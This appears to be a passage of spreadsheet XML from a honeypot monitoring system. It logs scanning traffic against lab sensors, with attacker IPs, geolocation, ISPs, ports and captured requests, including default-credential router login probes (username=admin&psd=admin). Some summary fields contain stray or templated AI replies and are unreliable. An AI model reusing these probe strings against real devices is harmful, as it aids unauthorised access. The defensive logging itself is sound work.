successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.221.72.58,50589)}&amp;&amp;{Data_SMB:Incoming connection (103.221.72.58,50930)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.221.72.58,53813)}&amp;&amp;{Data_SMB:Incoming connection (103.221.72.58,54212)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:67dd:483a"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="918"/>
    <x v="918"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-24T12:40:40"/>
    <d v="2025-03-29T02:27:38"/>
    <d v="2025-04-24T12:40:40"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H5"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Janpath)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6296"/>
    <s v="77.2183"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="business"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="2004-11-30"/>
    <s v="MTNL"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb1:6355"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="919"/>
    <x v="919"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-24T12:09:38"/>
    <d v="2024-11-30T10:35:48"/>
    <d v="2025-04-24T12:09:38"/>
    <n v="4"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H13"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Jagdamba Vihar)"/>
    <s v="1261481"/>
    <s v="110049"/>
    <s v="28.6012"/>
    <s v="77.0951"/>
    <s v="136637"/>
    <s v="Cify IT Services Pvt Ltd"/>
    <s v="Calcify It Services Pvt. Ltd"/>
    <s v="business"/>
    <s v="Cify IT Services Pvt Ltd"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:af6f:b528"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="920"/>
    <x v="920"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-24T11:39:36"/>
    <d v="2025-04-06T09:26:18"/>
    <d v="2025-04-24T11:39:36"/>
    <n v="12"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MYSQL_HC1"/>
    <s v="1433&amp;&amp;3306"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Thane"/>
    <s v="Navi Mumbai (Reliance Corporate Park)"/>
    <s v="6619347"/>
    <s v="NA"/>
    <s v="19.136"/>
    <s v="73.0039"/>
    <s v="55836"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="cellular"/>
    <s v="RJIL East FTTX PUBLIC"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}&amp;&amp;{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3125:67f4"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="921"/>
    <x v="921"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-24T11:35:05"/>
    <d v="2025-04-24T03:28:13"/>
    <d v="2025-04-24T11:35:05"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H19"/>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NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75c0:2044"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="922"/>
    <x v="922"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-24T11:27:46"/>
    <d v="2025-04-24T11:02:02"/>
    <d v="2025-04-24T11:27:46"/>
    <n v="12"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H4"/>
    <s v="5900"/>
    <s v="True"/>
    <s v="{'dnsbl-2.uceprotect.net': ['unknown']&amp;&amp; 'dnsbl-3.uceprotect.net': ['unknown']}"/>
    <n v="79"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="DO"/>
    <s v="Dominican Republic"/>
    <s v="02"/>
    <s v="Azua Province"/>
    <s v="Padre Las Casas"/>
    <s v="Padre Las Casas"/>
    <s v="3495664"/>
    <s v="NA"/>
    <s v="18.7317"/>
    <s v="-70.9392"/>
    <s v="6400"/>
    <s v="Compañía Dominicana de Teléfonos S. A."/>
    <s v="Compañía Dominicana de Teléfonos S. A."/>
    <s v="business"/>
    <s v="Compañía Dominicana de Teléfonos S. A"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_VNC:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:9400:9a7c"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="923"/>
    <x v="923"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-24T11:10:44"/>
    <d v="2024-09-11T02:05:00"/>
    <d v="2025-04-24T11:10:44"/>
    <n v="42"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H3&amp;&amp;SMA-LAB_MSSQL_H16&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru (Industrial Layout)"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.8884"/>
    <s v="77.6387"/>
    <s v="24560"/>
    <s v="Bharti Airtel Limited"/>
    <s v="BHARTI"/>
    <s v="residential"/>
    <s v="ABTS (Karnataka)"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7aa6:2c67"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="924"/>
    <x v="924"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-24T11:10:43"/>
    <d v="2024-02-16T09:27:53"/>
    <d v="2025-04-24T11:10:43"/>
    <n v="256"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_LDAP_H5&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MT-CPA_H39&amp;&amp;SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H13"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;389&amp;&amp;3306&amp;&amp;14063&amp;&amp;1433&amp;&amp;445"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="HN"/>
    <s v="Hanoi"/>
    <s v="Hoan Kiem"/>
    <s v="Hanoi"/>
    <s v="1581130"/>
    <s v="NA"/>
    <s v="21.0278"/>
    <s v="105.834"/>
    <s v="45899"/>
    <s v="VNPT Corp"/>
    <s v="VietNam Post and Telecom Corporation"/>
    <s v="business"/>
    <s v="Vietnam Posts and Telecommunications Group"/>
    <s v="None"/>
    <s v="VNPT-VN"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (123.25.11.41,53066)}&amp;&amp;{Data_SMB:Incoming connection (123.25.11.41,54355)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7b19:b29"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="925"/>
    <x v="925"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-24T10:47:48"/>
    <d v="2025-03-17T05:13:28"/>
    <d v="2025-04-24T10:47:48"/>
    <n v="44"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="medium"/>
    <s v="SMA-LAB_IMAP_H13&amp;&amp;SMA-LAB_FTP_HC1"/>
    <s v="143&amp;&amp;21&amp;&amp;8443&amp;&amp;23&amp;&amp;1080&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="CN"/>
    <s v="China"/>
    <s v="JS"/>
    <s v="Jiangsu"/>
    <s v="Taizhou Shi"/>
    <s v="Taizhou (Jingjiang Shi)"/>
    <s v="1793505"/>
    <s v="NA"/>
    <s v="31.9828"/>
    <s v="120.277"/>
    <s v="132883"/>
    <s v="Hong Kong San Ai Net Int'l Limited"/>
    <s v="Hong Kong San Ai Net Int'l Limited"/>
    <s v="business"/>
    <s v="Jiangsu Sanai network science and technology co, LTD"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;GET&amp;&amp;NA"/>
    <s v="{Data_IMAP:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2', 'Host': '103.211.202.140:8443', 'User-Agent': 'Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '103.211.202.140:8443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Host': '103.211.202.140:8443', 'User-Agent': 'Go-http-client/1.1', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:672b:123b"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <s v="The attacker is attempting to scan and connect to various services on the target system, likely trying to identify vulnerabilities or gain unauthorized access. The activities indicate a reconnaissance phase, where the attacker is gathering information about the system's configuration, services, and potential entry points. &amp;&amp; It appears that the attackers are scanning for open ports and attempting to gain access to various services, likely as part of a reconnaissance phase or pre-authentication attack. &amp;&amp; The attacker is attempting to scan and exploit various services on the targeted system, likely for potential vulnerabilities or unauthorized access. The attacker is using multiple protocols, such as DHCP, DNS, FTP, HTTP, HTTPS, IMAP, IPP, IRC, LDAP, MSSQL, MYSQL, NTP, Oracle, PJL, POP3, POSTGRES, RDP, REDIS, SIP, SMB, SMTP, SNMP, and SOCKS5. &amp;&amp; Here are the possible malicious activities and their corresponding attack names:"/>
    <s v="  &amp;&amp; Scan and Exploit Attack &amp;&amp; "/>
  </r>
  <r>
    <x v="926"/>
    <x v="926"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-24T10:20:56"/>
    <d v="2025-04-24T10:20:56"/>
    <d v="2025-04-24T10:20:56"/>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4:4f0a"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="927"/>
    <x v="927"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-24T10:11:54"/>
    <d v="2024-12-13T16:25:38"/>
    <d v="2025-04-24T10:11:54"/>
    <n v="96"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H35"/>
    <s v="23&amp;&amp;80&amp;&amp;NA&amp;&amp;9100"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="VA"/>
    <s v="Virginia"/>
    <s v="Loudoun"/>
    <s v="Ashburn"/>
    <s v="4744870"/>
    <s v="20147"/>
    <s v="39.011"/>
    <s v="-77.4711"/>
    <s v="701"/>
    <s v="Verizon Business"/>
    <s v="Verizon Communications"/>
    <s v="business"/>
    <s v="MCI Communications Services, Inc. d/b/a Verizon Business"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;GET&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;NA&amp;&amp;{Data_PJL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:47f7:d25e"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="There is insufficient log data provided to analyze."/>
    <s v="There is no log data provided. Please provide the log data, and I'll be happy to help you analyze it."/>
  </r>
  <r>
    <x v="928"/>
    <x v="928"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-24T10:11:39"/>
    <d v="2024-09-11T18:56:00"/>
    <d v="2025-04-24T10:11:39"/>
    <n v="519"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_LDAP_H1&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H45"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;389&amp;&amp;NA&amp;&amp;57695&amp;&amp;57973&amp;&amp;36817&amp;&amp;36998&amp;&amp;80"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AF"/>
    <s v="Africa"/>
    <s v="NG"/>
    <s v="Nigeria"/>
    <s v="AK"/>
    <s v="Akwa Ibom State"/>
    <s v="Ibesikpo Asutan"/>
    <s v="Nung Udoe"/>
    <s v="2328583"/>
    <s v="NA"/>
    <s v="4.91657"/>
    <s v="7.96314"/>
    <s v="329244"/>
    <s v="Connect, Surf and Smile Limited"/>
    <s v="Connect, Surf and Smile Limited"/>
    <s v="business"/>
    <s v="Connect, Surf and Smile Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'method': 'GET', 'uri': '/boaform/admin/formLogin?username=user&amp;psd=user'}}&amp;&amp;{Data_HTTP:{'method': 'GET', 'uri': '/boaform/admin/formLogin?username=admin&amp;psd=admin'}}&amp;&amp;{Data_HTTP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:66d4:2875"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="929"/>
    <x v="929"/>
    <s v="NA&amp;&amp;prod-barium-us-east-95.li.binaryedge.ninja"/>
    <x v="0"/>
    <d v="2025-04-24T10:11:33"/>
    <d v="2025-03-26T22:57:48"/>
    <d v="2025-04-24T10:11:33"/>
    <n v="23"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_REDIS_H15"/>
    <s v="1433&amp;&amp;6379&amp;&amp;3389&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="high"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="NJ"/>
    <s v="New Jersey"/>
    <s v="Morris"/>
    <s v="Hanover (Cedar Knolls)"/>
    <s v="5098805"/>
    <s v="07927"/>
    <s v="40.8218"/>
    <s v="-74.45"/>
    <s v="63949"/>
    <s v="Akamai Technologies, Inc."/>
    <s v="Akamai Technologies, Inc."/>
    <s v="hosting"/>
    <s v="Linode"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_MSSQl:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2d4f:8616"/>
    <s v="C-I_D"/>
    <s v="high"/>
    <s v="Low"/>
    <s v="There is insufficient log data provided to analyze any possible malicious activity."/>
    <m/>
  </r>
  <r>
    <x v="930"/>
    <x v="930"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-24T10:10:40"/>
    <d v="2024-02-26T13:31:00"/>
    <d v="2025-04-24T10:10:40"/>
    <n v="120"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_MT-CPA_H27&amp;&amp;SMA-LAB_MT-CPA_H15&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;26253&amp;&amp;5443&amp;&amp;48351&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.0423"/>
    <s v="121.567"/>
    <s v="4780"/>
    <s v="Digital United Inc."/>
    <s v="Digital United Inc."/>
    <s v="residential"/>
    <s v="New Century InfoComm Tech. Co., Ltd."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:afb4:8e9d"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="931"/>
    <x v="931"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-24T10:07:03"/>
    <d v="2025-04-24T05:57:15"/>
    <d v="2025-04-24T10:07:03"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_HC1"/>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2007-08-01"/>
    <s v="BB-Multiplay-General"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75dd:d3cf"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="932"/>
    <x v="932"/>
    <s v="23-92-78-243.static.hvvc.us"/>
    <x v="0"/>
    <d v="2025-04-24T10:07:03"/>
    <d v="2025-04-24T10:07:03"/>
    <d v="2025-04-24T10:07:03"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_VNC_HC1"/>
    <s v="5900"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="NY"/>
    <s v="New York"/>
    <s v="Richmond"/>
    <s v="Staten Island"/>
    <s v="5139568"/>
    <s v="10311"/>
    <s v="40.6032"/>
    <s v="-74.1819"/>
    <s v="29802"/>
    <s v="HVC-AS"/>
    <s v="HIVELOCITY, Inc."/>
